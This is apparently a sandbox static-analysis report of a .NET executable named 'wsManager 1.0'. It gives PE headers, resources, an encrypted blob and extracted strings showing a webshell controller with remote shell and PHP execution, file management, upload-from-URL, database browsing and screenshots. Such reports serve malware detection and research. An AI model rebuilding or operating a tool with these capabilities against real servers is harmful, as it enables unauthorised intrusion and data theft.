Static | ZeroBOX

PE Compile Time

2021-05-20 00:47:57

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0005c0b4 0x0005c200 7.76585432082
.rsrc 0x00060000 0x0005acd0 0x0005ae00 2.605186854
.reloc 0x000bc000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x000b64f8 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000b64f8 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000b64f8 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000b64f8 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000b64f8 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000b64f8 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON 0x000ba730 0x0000005a LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x000ba79c 0x00000334 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000baae0 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
7\s
_&s
v4.0.30319
#Strings
get_Setting0
set_Setting0
IEnumerable`1
IEnumerator`1
List`1
label1
get_Item1
toolStripSeparator1
Tuple`2
KeyValuePair`2
IDictionary`2
get_Item2
toolStripSeparator2
Tuple`3
get_Item3
get_UTF8
<Module>
treeDB
DOWNLOAD
UPLOAD
RENAME
BROWSE
DELETE
get_ODhZuvIPF
get_ASCII
cmsSQL
lblURL
colURL
BASICINFORMATION
FILEINFO
System.IO
tsmiZIP
SCREENSHOT
cMenuStripLV
get_Magenta
FromArgb
mscorlib
lblDtb
btnExec
shellexec
phpexec
System.Collections.Generic
Microsoft.VisualBasic
Thread
add_Load
fileManagerForm_Load
wsManagerForm_Load
sfdDownload
tsmiDownload
download
tsmiUpload
upload
tsButtonAdd
btnAdd
RijndaelManaged
set_Enabled
get_IsSelected
selected
System.Collections.Specialized
Synchronized
isValid
<lastMod>k__BackingField
<name>k__BackingField
<type>k__BackingField
<size>k__BackingField
<permisions>k__BackingField
command
Append
cLastMod
get_lastMod
set_lastMod
GetMethod
password
defaultInstance
set_Mode
set_AutoScaleMode
FileMode
set_SizeMode
PictureBoxSizeMode
set_RenderMode
ToolStripRenderMode
CipherMode
get_SelectedNode
TreeNode
set_Image
set_InitialImage
get_Message
get_ReturnMessage
AddRange
Invoke
pVariable
setVariable
variable
Enumerable
IDisposable
RuntimeTypeHandle
GetTypeFromHandle
Console
set_BorderStyle
set_FormBorderStyle
FontStyle
set_DisplayStyle
ToolStripItemDisplayStyle
get_Name
set_Name
get_FileName
set_FileName
colReleaseName
colHostName
SetKeyName
get_name
set_name
tsmiRename
rename
tbuname
get_plane
WriteLine
get_NewLine
set_Multiline
GetType
get_type
set_type
System.Core
picture
get_Culture
set_Culture
resourceCulture
Capture
MethodBase
ButtonBase
ApplicationSettingsBase
TextBoxBase
Dispose
browse
isNotDuplicate
Create
DebuggerBrowsableState
EditorBrowsableState
tsmiDelete
delete
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
DefaultSettingValueAttribute
UserScopedSettingAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
get_Value
chValue
colValue
tsButtonSave
Remove
xFGzRuFvp.exe
set_Size
set_MinimumSize
set_AutoSize
set_ClientSize
Serialize
Deserialize
ISupportInitialize
get_size
set_size
get_Tag
set_Tag
System.Threading
set_Encoding
cmsSQL_Opening
cMenuStripLV_Opening
add_Opening
cmsFileManager_Opening
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
GetString
disposing
System.Drawing
SaveFileDialog
CommonDialog
ShowDialog
ComputeHash
tbPath
selectedFilePath
selectedFolderPath
set_Width
get_Length
button1_Click
tsmiZIP_Click
btnExec_Click
tsmiDownload_Click
tsmiUpload_Click
tsButtonAdd_Click
btnAdd_Click
add_Click
tsmiRename_Click
tsmiDelete_Click
tsButtonSave_Click
btnExecSql_Click
pHPExecToolStripMenuItem_Click
deleteToolStripMenuItem_Click
shellToolStripMenuItem_Click
fileManagerToolStripMenuItem_Click
sQLExplorerToolStripMenuItem_Click
informationsToolStripMenuItem_Click
ScreenshotToolStripMenuItem_Click
exportToolStripMenuItem_Click
tsmiNDir_Click
tsmiProperties_Click
btnGetDbsTbls_Click
btnScrnShot_Click
tsButtonAbout_Click
treeDB_DoubleClick
add_DoubleClick
lvExplorer_DoubleClick
PerformClick
TransformFinalBlock
tssLabel
ToolStripStatusLabel
System.ComponentModel
get_Level
selectedWebShell
tbShell
Webshell
ContainerControl
btnExecSql
sfdSql
getUrl
setUrl
set_ImageStream
FileStream
FromStream
MemoryStream
tbParam
pParam
getParam
Program
get_Item
set_Item
ListViewSubItem
chItem
colItem
ToolStripItem
pHPExecToolStripMenuItem
deleteToolStripMenuItem
shellToolStripMenuItem
fileManagerToolStripMenuItem
sQLExplorerToolStripMenuItem
informationsToolStripMenuItem
ScreenshotToolStripMenuItem
exportToolStripMenuItem
ListViewItem
System
SymmetricAlgorithm
HashAlgorithm
Random
parentfrm
addWebshellForm
sqlForm
phpForm
fileManagerForm
wsManagerForm
fileInformationsForm
informationsForm
screenshotForm
aboutForm
ICryptoTransform
resourceMan
screen
AppDomain
GetDomain
lblLogin
Application
set_Location
fileInformation
querybasicalInformation
queryInformation
System.Configuration
System.Globalization
Interaction
set_HideSelection
System.Reflection
TreeNodeCollection
ImageCollection
StringCollection
MatchCollection
ControlCollection
ListViewSubItemCollection
ToolStripItemCollection
SelectedListViewItemCollection
GroupCollection
ColumnHeaderCollection
Exception
ToolStripButton
btnOpn
ToolStripDropDown
MethodInfo
CultureInfo
Bitmap
ToolStrip
toolStrip
StatusStrip
statusStrip
set_ContextMenuStrip
set_TabStop
xFGzRuFvp
System.Linq
ColumnHeader
MD5CryptoServiceProvider
StringBuilder
filesInCurrentFolder
foldersInCurrentFolder
sender
set_AllowColumnReorder
get_ResourceManager
ComponentResourceManager
cmsFileManager
webshellManager
get_OffsetMarshaler
CancelEventHandler
System.CodeDom.Compiler
ImageListStreamer
IContainer
ToUpper
imgListExplorer
lvExplorer
WebBrowser
webBrowser
lblParameter
set_Filter
BinaryFormatter
ToLower
tsmiNDir
newDir
set_Anchor
set_UseCompatibleStateImageBehavior
set_ForeColor
set_BackColor
set_UseVisualStyleBackColor
set_TransparentColor
set_ImageTransparentColor
ToolStripSeparator
getDirectorySeparator
directorySeparator
IEnumerator
GetEnumerator
.cctor
CreateDecryptor
selectedWs
currentWs
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
webshellManager.shellForm.resources
webshellManager.addWebshellForm.resources
webshellManager.sqlForm.resources
webshellManager.phpForm.resources
webshellManager.fileManagerForm.resources
webshellManager.wsManagerForm.resources
webshellManager.fileInformationsForm.resources
webshellManager.informationsForm.resources
webshellManager.screenshotForm.resources
webshellManager.aboutForm.resources
webshellManager.Properties.Resources.resources
DebuggingModes
get_Nodes
get_Images
Matches
webshellManager.Properties
tsmiProperties
listFiles
EnableVisualStyles
AnchorStyles
set_GridLines
WriteAllBytes
GetBytes
Settings
CancelEventArgs
btnGetDbsTbls
lvWebShells
webshells
get_Controls
get_Items
get_SubItems
get_SelectedItems
cPerms
pPerms
System.Windows.Forms
Contains
get_Columns
get_permisions
set_permisions
set_AutoScaleDimensions
System.Text.RegularExpressions
lvInformations
System.Collections
RegexOptions
refreshListViewInfos
get_Groups
set_ScrollBars
tbpass
pAddress
address
components
get_Keys
Concat
GetObject
set_FullRowSelect
System.Net
colServerSoft
EndInit
BeginInit
GraphicsUnit
get_Default
SetCompatibleTextRenderingDefault
DialogResult
set_Indent
setWebClient
client
Environment
InitializeComponent
get_Parent
get_Transparent
get_Current
set_Font
get_Count
btnScrnShot
takeScreenshot
AES_Decrypt
Convert
SQLrequest
set_SmallImageList
tbHost
lblHost
tsButtonAbout
SuspendLayout
ResumeLayout
PerformLayout
tbOutput
set_DefaultExt
MoveNext
System.Text
get_Text
set_Text
WriteAllText
set_DocumentText
get_ContextMenu
set_ContextMenu
set_View
TreeView
ListView
set_TabIndex
set_ImageIndex
MessageBox
PictureBox
InputBox
TextBox
get_DimGray
ToArray
get_Key
set_Key
ContainsKey
System.Security.Cryptography
get_Assembly
set_ReadOnly
System.Runtime.Serialization.Formatters.Binary
get_CurrentDirectory
op_Equality
WrapNonExceptionThrows
wsManager
webshellManager
Copyright
Fayva
$9480809e-5472-44f3-b076-dcdf7379e766
0.8.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName.NET Framework 4 Client Profile
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
16.0.0.0
@sHFvx0q4/K8lnT8Bgj7Honj9FeoJx3m09qQQKpOks/cvHlhu13IwlA6Q9a/gNBVJ5cXjmRKZ1D916MKREyEpQ+XF45kSmdQ/dejCkRMhKUPSgzApG55hJQOLjnxIL0qsdY2TttP6jIcpFBK26FGQz1ese92VWgsRJFT1srbgo5SFPIMk+jbLKTQ5ewNnKClI5csh6i5HItc6B40fr9wVIfYpUxb63Gvz4DGxgcD7qn2prJsnnb2tpZ+3zDqOUhcoTOoF0F7KDoLSLZDP3aQ5cAqh/bcGXWvQpfVDZoDC66W+BXEQw8VkWZAHPNKFE6WCHrFZSZRNnLmsFEVYbuP2vRCSCNnl0QunusjLYUjrpmh8VErpWAY1/V7I16y0VjoyjJuT69eJwLLel386l6eu5zOdayzYn9f1bz4+PeJ6zc9S6VznOgoJxyU4RtV6leF5RLtVRK4K2xwzlGl4S/N590FaRLlGOPlfKNdzdFir8QflxeOZEpnUP3XowpETISlDpZLKzGPxa3hdz4DwbjDcc2srJss/5AE3iTTPVpMvnT3lxeOZEpnUP3XowpETISlD5cXjmRKZ1D916MKREyEpQ26fR4EqClUekMyy8JYlF4mhzAzkwjl6MfyoOTTcd8YLKV4iIa2nFdRG/0tmBA5F17vQoxVBC+VMpaHf+LDY9uoLgbS3OvTHjB4z6ATcexiD+BGzDIGF8i8sdwK37YiT7hl2F/q17ITRu8puCI03h0vYgApWSMzrOwpk1K8poGk58pKbf/rDJ+Wmlx4VqSr3FRbB7ROoZSwuv5jck6gq1ANSOE4p1mBTW7tUEDC5OhN4Ggam4cNlgQPNZ62TSQI34+XF45kSmdQ/dejCkRMhKUMAdKkhCtKfMz72Xjl6d28qckd98yNwUw5Jb9wIFTEt8TieERMI4DOIsS7yxqvr31bRPtv1MS1ywR0uaoqLv9f75cXjmRKZ1D916MKREyEpQ+XF45kSmdQ/dejCkRMhKUPlxeOZEpnUP3XowpETISl
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
System.Windows.Forms.ImageListStreamer, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PADPADP
WSystem.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
&System.Windows.Forms.ImageListStreamer
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
hSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aPADPAD|
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
IDAT8O
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
IDAT8O
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
IDAT8O
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
hSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aPADPAD
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
IDATx^
vD6;`[
}h/XKF
$R1u<Rz
h:G<C*
%hf<$d
?~RblV
!/'prj
I}HHXM
(Z7yk
i9B}|x,
mgSE;[
uy$<HG
RfRT9f}
m''Nn,
[uo*<v
?>V@jc
`y^6:c
MA0d{zQ!
|5/#/:
<8E[I#
e=ccg1
A*,G@M
{HK/Bw
4?L 'Q@
G~.7%(S
N\K7gQ
lDd>r}
)[f3?q
p}Km>I
Ol2;)*y@
$g-VnBX
)|5s'm
?f9RC.1sg
ZOl.4Q(
$>iD7(
_j84v&
AP`{Rz
B`:}x``
=4}F0Pa
jP9p,/\
oSi.P
TSj|-0
~LZm9?
9q7kdzQ(
d7FQ3Y=
`Ta+jNj
i'J[VP
-;Q8hM
<VI`B^
)+NshI8
#BS]3g
15.w[q
sSlx{X
X`(Z36q
M"bF!
b)Cf,cZ
"FIlaKv;V'"x
I\}]C@
BDEIIJ
AZz3gk#
+kx~v2
@No!W$
]"0l?1s
h6Dat(
o3Ps '
fj[5S]
a6yi>3
\N,]Dqj!
hbLY.b
:((5KZ
?m@Yq=
+6o94j9
'7OKR[
a<qz?p
?}x5v2i
iq&CLT
ts'q>Bh
f57.h!>i(
B~L:kZ
0sv#L8
d<xL5U;
2Df5MK
5s5~4S
aG*w~>"
!Ax1mJ6
Mh]"FI
F4BT(\
r\~#_~
rU].-|
o{FpU]
S~^p%M
m![':c
X/A_E-
5lnwgHK
*uw":f;
,">r$b
Jn aZ N+*
dV;,K3
h:?l%Fm
%TOe[9Q
(FGL$f
{o1{c4
Z3g2I&
$POcz.GS
F`vo<v
,nH%pGa'
:tr615M
Q_&1ps=
' vD@B[
V3']\h
Di^kFx
l'uM+w
%nx>nCKP6
Z~4~Fn
kl JR^
k_LgB_
@Ad1BGo
j^+`\1
Vr5u13
^- 7ah
"g3&WndI
19v-{>+c}
&g.<rb
s.0Bm=_
ND\Nq'
.xMM!w
'oo]aqF+o>
&rrD(<
V ~v:5
@}u.+J
#h^Tdy
}&p`P5
+(Ojg
V$jTx
\Y*,+9
Bt#~73
9p%q-^
hWi&`}=a
gTT1_
6S"27p,
@an\`R
Bt+g<RIVt
X^Xm%
^ws<g?
roK9JO
PGvE#>
~C.]~.
-bvw)"
Axv.gUU
1Ru${e+
l`oQ$9cMq
V.9;b>7k
8mQ@$Z
Xim"D<
(7s*)
;dEGrc
9O^Zl!u
_[N t)
|voAzl
fv<~Gtz
g$}D:y5Y
i;kXz5
OZ2Zx
Vdq3y-W
E/dU~"o:
*1hy4~1fh
+*n0pN#R
H+0gHF
fP5g$b
/ z]@(
LsT/C"=
W7^Q;>
>iM&nj
\^O(zQQd
}SAX};N
[usxs+
n7>u"H
D$YR<-
frAs(]
7D/fGw
rIl.Urqs$
89ybX*A
{>KX*u
&=rep@
WW1sa"
roM9#6
j;=s/qP
PREOS#]
naac>.1
\f>Y;y
TDiRKB
nbBC1_f
.[$O~a
K-$h-s
N(dZ{9w
;JW62;J
Xdm?`q
p>AYw#im3
S87p)
y<3L^3B
GAVp?+X
-HN-A'
CKphVFJ,
e)7O=bh
oVJeiW
h=$5Ga
v_Onkn g
)N"3p'
LniVsV
)KVXpb_,U
EWb(\B
{`j eq7
35ur}D
5{MmxP
av@f$-I
8,\E0Ouf
\Eza;}
^@x^.U\
e}s'S<
D|}N{
l.N7 m
#cndql
YmNZZ1G
j>ehRpi0
yHp?Y~
A-m/3
UAGA7c
)KI'<7
`BS!IAUx
w[? [bN
)QG4_Vr
Rq)LSu
oBy0s*
jE`XC,
1t~+sS
J]U7:K
?XFv#|F
}kM&>Q
o?e+?
w/?U'3
=(Wj 6
Njw34*
{)2Ox4_v
F~#kU-
:B{{Pp
59G:8l
-P/_&w
oV>br~
AhE Nu
hr$3XPr
TQ)*CQQ
sww<:7
6&{=`[
G{O$Ol
-o{sYd\
<i"i3O
@#}umh
5xi)2<o-ur
7*cCYb(
jF_p/rd
S/jMez
-YFX+1
X8$qri V
}t}99_
F-K5_aw
c`{z*:ss
hosDtW
-kY0J
-YOQU=
9hJnf"}
u>B[#
pn*K"v
(cLNN..
ipWp-aC
8wR_3/
M{p?Z@
gn@nR5u*
dXc5~&
!2I*<+
9Mb+pn
~$/f v
f^w(r)
3=D`)*7
dnh 8U
_.aA]
h#"{!KK
sfWZ0pm
EwS+_l
g>y!GQ
'q]u(yR
hR4#nm
Q\IcJ.Fo
Ya;)nN
Y|&Bm07
]+V/3a
4#vf$#6
=r-k;>2
Qz-,],
THf!_bJ
.KqLe3#
HA{+'$
%o2wV3
C~0Qz1Cb-8=y
vs}\5I
[!!#Q)D%+e$J
~Wyxn/b
b\Z*S~&p
P~L;/F
K<N;Io
.KkD+
)nxQq
Z16L;6
4/e|Q~
E0jh-S
%~svM1
eLGL(c
,Yr|8w"
h5aK/#
d+'e$P
f"fXbv
6\W@_2
+VsKx#
{=Kh>u
#Stwd3
Uuw.lOHU;
M~B0o"
[\Nm$m
uHs_b8
z-AFg=
9-'Yln
5AA9Lfj
AdX2A/
mubMl62
ln.c~U+A}w
r|W_$w
}WY0X0P
H@27j\1
5z5yy{
)O+4JW
GntXi0Pj
Gyt5wkJ
u_wNy\
f|6m"W
qVg!E2
IDATS";
x&o!kR-
cF/+>WP7V]pNT9`5
3]5Y,
+I*k!yO'!7#
j_UO\,.28o
*Xun23M
L/~;D2r
o8Kql9
I{s.M@y
>D?,dMm:
AF4>D
UroC1G
h>#MvA
_*HindR
Bg.`;b
;k6>xH
2|{+i8-
-Xio&v
rFWUq7I
2iAX="
>4lN#-Y
ww>>EV4-
w$BPt
4~Tib35
hr"c./
v"d7bV]O
l^GgX'
c8OH dP
\}6NZD
+=f`i?
qhi$3U
x\7!4
v1sW.]
1ih(R^pty=G7u
WWq(b=
v ~On`
|_EUR$M
ACE!~z
"@b.}.
BmU%$F
E,ggHrL
UTOCA3?{V
oB'-#N|
GUP8c
4&-TF$
v=*V/y
s8r?}z~
iBwZ+G
{CsP-.?=
4b^Kc4
!6<K s
+qqW={g/
+ULyyd
(n(@cH
d1\Phk%
Y&DYIz_)
.d_ldH
8Qe)(d.
.7g`}9
^0k@q\
MaB`,V,
R~o98G
;ZBoP9'
qd?e'/
nNEz"=3
S/3H>w
j"v{=ECV
/6j&c{
1p5{Zj
<&dy#Z
;p5~Od
5y:p?
6#K{S$
(KS-xa~
b=z.A.:l
5~MoQ;<
]oFmr&
>Ww*r>
0jV!?V
3m=h[6
q~*zse
wN$kGt
lWIpR/
^+]Xc_
xFotckO4
/C<}9l
E}H"56
fur9f8
>LU(#x
Goh8WL
\R.3yR
PG*i2mgwPo
pWf;w?:
0~_pdM
\(8CMa&
U)on["
_NK,`r
h$Uate8
T;-/g
2vJ)+;
Z0A.!S
Z2u^2qn
(7R`EF
+6E|w~
n6sdZi
rxf%y"[
G'wt,8
Rg<3?sAo
{x?vVO'
HaF3s}tY
OIcJ]!
!V@nUd
h6KCiw+
$*ZGY_
Mkypi
O@?s!Ya
7h-jFu
d>v/#(
o<Y3i1
4n-EkT
Z@P?O6
6{wD&
RLOME!P
}dX|x+
kX{};2
%Bw*mi
x}+bSF3^&
i6NwcY
+Gn[#yO
9E/Yux,M
i?WK~p
Lr|%mM
"5b%{^
[oZc~j
y*4D~'B\
$8^kCGq
k+tv`
PUIt&,
rxB=!
3iVKCJ5
gW'sr]
%lO^"H
WqC6DYr
8'=)|
V|_I 3Z
Yzz/3b
dUK`Z3
=GW~/__
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
pIDATx^
ItyGs/@
}p[[4O.-
_a%^u*
De&t'|
GJJJJJJJJJJJJJJJJJJJJJJJJJJJ
_CorExeMain
mscoree.dll
:,,#=+,
>,,)=*,
<++/=*-
=++6>*,
<++<=),
=*.C=),
>)-J=+,
<),Q=*,
=)+X<*,
>++_=*+
<+-f=+,
=*,m=*,
>*,t<*,
<),{=*,
:))=*,
>))%=*,
=++*<*+
;'.'>*,t>+,
=+-}<(-3
:++0=*,
?++5=*,
<**7=),
>)-><+,
:,,#=*,
<)-D=*,
<+-r=*,
<,,L=*-
>,,R=*-
<++Y=*-
>*-[=*,
=+-`=*,
>*-g=*+
>),o>+,
?),E=*,
=),u<*,
>)+|=*,
<++/=*,
=+-}=*,
>'.!>*+
<(/&=*+
>*-g=*,
;**+=)-
>**1<),
=,,.;).8=+,
<),Q=*,
>,,:=*,
@++$=*,
<+-r=*,
=*,\=*,
>,,F=*,
<++/=*,
=+-}=*,
>*-g=*,
<),Q=*,
=++;=*,
@++$=*,
<+-r=*,
=*,\=*,
>,,F=*,
<--"=)-
@--(=+,
=,,.<*,
?++5=*-
<++<=*,
=*.C=),
>)-J=+,
>,,R=*,
<++Y=*-
=+-`=*,
=*,h=*+
>),o>+,
=)+v=*,
=+-~=*,
:,,#=+,
>,,)=*,
<++/>*,
=++6>*,
?*.==),
<)-D=+,
=),K>*,
=++S=*-
>+-Z=*,
<*-a=*,
=),i=*,
=)+p=*-
<+-w=+,
=+-}=*,
;**+=+,
>,,:<*,
=).2=+-
;).8<+,
=(-?=+,
?),E>*,
<,,L=*,
>,,R>*,
<++Y=*+
>++_>*+
=++e=*-
=+-l=*,
<+-r=*,
>'.!=*,y=*,
@--(<*,
=,,.=*,
?++5<*,
=++;=*+
>++B>*+
<++H=)-
=*-O=)-
<*-U<),
=*,\=),
<*,b=),
=*,h=+,
>),o=+,
=),u=*,
@++$>)+|<*,
=++*=)+
>**1=+-
;).8=+-
>)->>+,
<)-D<+,
=),K=+,
<),Q<*,
=)+X=*,
<)+^>*+
=++e=*+
>++k=*,
<+-r=*,
@(0 >+-x>*,
;'.'=+-~=*,
>(--=*,
;,,4=*,
>,,:=*,
?++A<*,
=++G=*+
>++N<*+
=++T=*-
>+-Z>*,
<*-a=*,
>*-g=),
<*,n=),
>*,t=+,
:,,#<),{=+,
>,,)=*+
:++0>)+
<**7=)-
?*.=>+,
<)-D=+,
>)-J=+,
<),Q=+,
>),W>+,
<),]=*,
=)+d=*,
<)+j<*+
=++q=*-
@(0 <+-w>*,
<(/&=+-~=*,
>(-->+,
<(-3=+,
?(-9>*,
<,,@=*,
>,,F=*,
<++M=*,
=++S=*-
>+-Z=*-
=+-`=*-
<+-f<*,
=*,m=*,
>*,s>),
@(0 <++<>,,:I$$
D>VV@@@
:,,#APV
CQW&Cnw
>U[-Cpz
B^^6Ds}
@\`@Dbg
?++5=)-
<++<>+-
=*.C>,.
>)-J=-.
<),{<(/&
<),Q=-/
<),{>))%
=)+X=-.
<**7=*,
=*,z>))%
=+-`=-.
=*,z<)+j=-.
>'.!=*,
>),oC2/
=)+XC0-
<)-D=+,
=),K>*,
>,,R=+-
<++Y=+-
=+-`=+-
>*-g<+,
?--I@CG
?22Q?CG
=14X?BG
@5:`@AF
=8;h?AF
@9=p@?D
=;?y?=B
:,,#??C
>,,)??D
<++/?AF
=++6ABG
<++<?BH
<-1D@CI
<++H=).2
>'.!?47
>++_@00
<(/&>69
>++_@00
@).,>69
?00jvm;
E63Usc5
<)+jE4/
<--r=04
?,.y>02
=03d=/1
ASVJ@JP
ALNr@IO
@OQ{@IN
@(0 APW
>28)AQV
A16/APV
@;;8?PU
@<@@AOU
<*,n=*,
=),u<*,
>)+|=*,
>'.!>*+
<(/&=)-
@).,=+,
<(-3=*,
<*-U=),
>*-[;''
?(-9>*+
>+-Z;''
<,,@=*-
<++M=*,
>+-Z;''
<++H=*,
<++Y@++
=*-O>),
<++Y@++
>*,V=+,
<**7=*,
=)+X@++
<),]<*,
=)+XF..
=)+d=*,
>),WF..
=+-l=*,
@(0 =*,
>),WF..
>*,s=*,
<*,n=*,
>*,V=))
=*,z=*,
>),W=*,
?++A=*,
=++*=*,
>+-x=*,
<*,b=*,
=),K=*,
?++5=*,
=)+d=*,
>++k=*,
<+-r=*,
=*,z=*,
@(0 <*,
<(/&=*+
@).,=+,
=).2>+,
?(-9=*,
<,,@=*-
<++H=*,
=*-O>),
>),W=+,
<),]=+,
;,,4=*,
>,,:=*,
?++A<*,
=++G=*,
<++M<*+
=++T=*-
>+-Z>*,
<*-a=*,
>*-g=),
<*,n=),
>*,t=+,
:,,#<),{=+,
>,,)=*+
:++0<*+
=++6=)-
?*.=<)-
=*.C=+,
>)-J>+,
=)-P=+,
>),W>+,
<),]=+,
>),c=*,
<)+j=*,
=)+p=*-
@(0 <+-w=*-
<(/&=+-}=*-
@).,>+,
<(-3=+,
?(-9>*,
=(-?=*,
>,,F>*,
<,,L=*,
=++S>*,
<++Y=*-
=+-`=*-
<+-f<*,
=*,m=*,
>*,s>),
<--"=*,z=),
>*-[=*-
<*,b=*,
=),i=*,
=)+p=*-
<+-w=*,
=++T=*+
=+-~=*,
<*-U=*,
?++A@++$>*+
=(-?=*,
>,,)=*,
<+-w=*,
=+-`=*,
:))=+,
@++$>*,
=++*=*,
:++0=*,
<**7=),
>)-><+,
?),E=*,
<,,L=*-
<*-a=*,
<++/>59
=,,.=68
?++5>78
=++;=7:
>++B?8;
<++H>8<
=*-O?8>
<*-U>9>
=*,\?:=
;,.c>:>
>-0k>9=
?/1r?9;
:))=.2z>7<
>))%?35
;**+=47
=).2=48
?(-9=7:
=(-?=7:
>,,F?8;
<,,L>8<
=++S<*+
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
picture
label1
wsManager 1.0
https://github.com/guillaC
aboutForm
Add -
=echo "
this webshell is already registered
tbParam
btnAdd
lblURL
lblParameter
Get Parameter:
addWebshellForm
ODhZuvIPF
File Information -
lvInformations
fileInformationsForm
File Manager -
this is not a File object
this is not a Folder object
folder
folder name
file name
upload
filename
must be compressed.
tbPath
lvExplorer
Modification Date
Permisions
cmsFileManager
tsmiRename
Rename
tsmiDelete
Delete
tsmiZIP
Compress
tsmiDownload
Download
tsmiUpload
Upload from URL
tsmiNDir
New directory
tsmiProperties
Properties
imgListExplorer.ImageStream
btnOpn
fileManagerForm
Server Information -
informationsForm
Php Exec -
webBrowser
btnExec
Execute
phpForm
Screenviewer -
screen
btnScrnShot
Screenshot
screenshotForm
Shell -
Courier New
tbOutput
tbShell
shellForm
SQL -
SHOW DATABASES;
SHOW TABLES;
<table border="1"><thead><tr>
</tr></thead><tbody><tr><tbody>
</tbody></table>
SELECT * FROM
btnGetDbsTbls
Get DBs && tables
treeDB
lblDtb
Database:
Password:
lblHost
tbpass
tbuname
tbHost
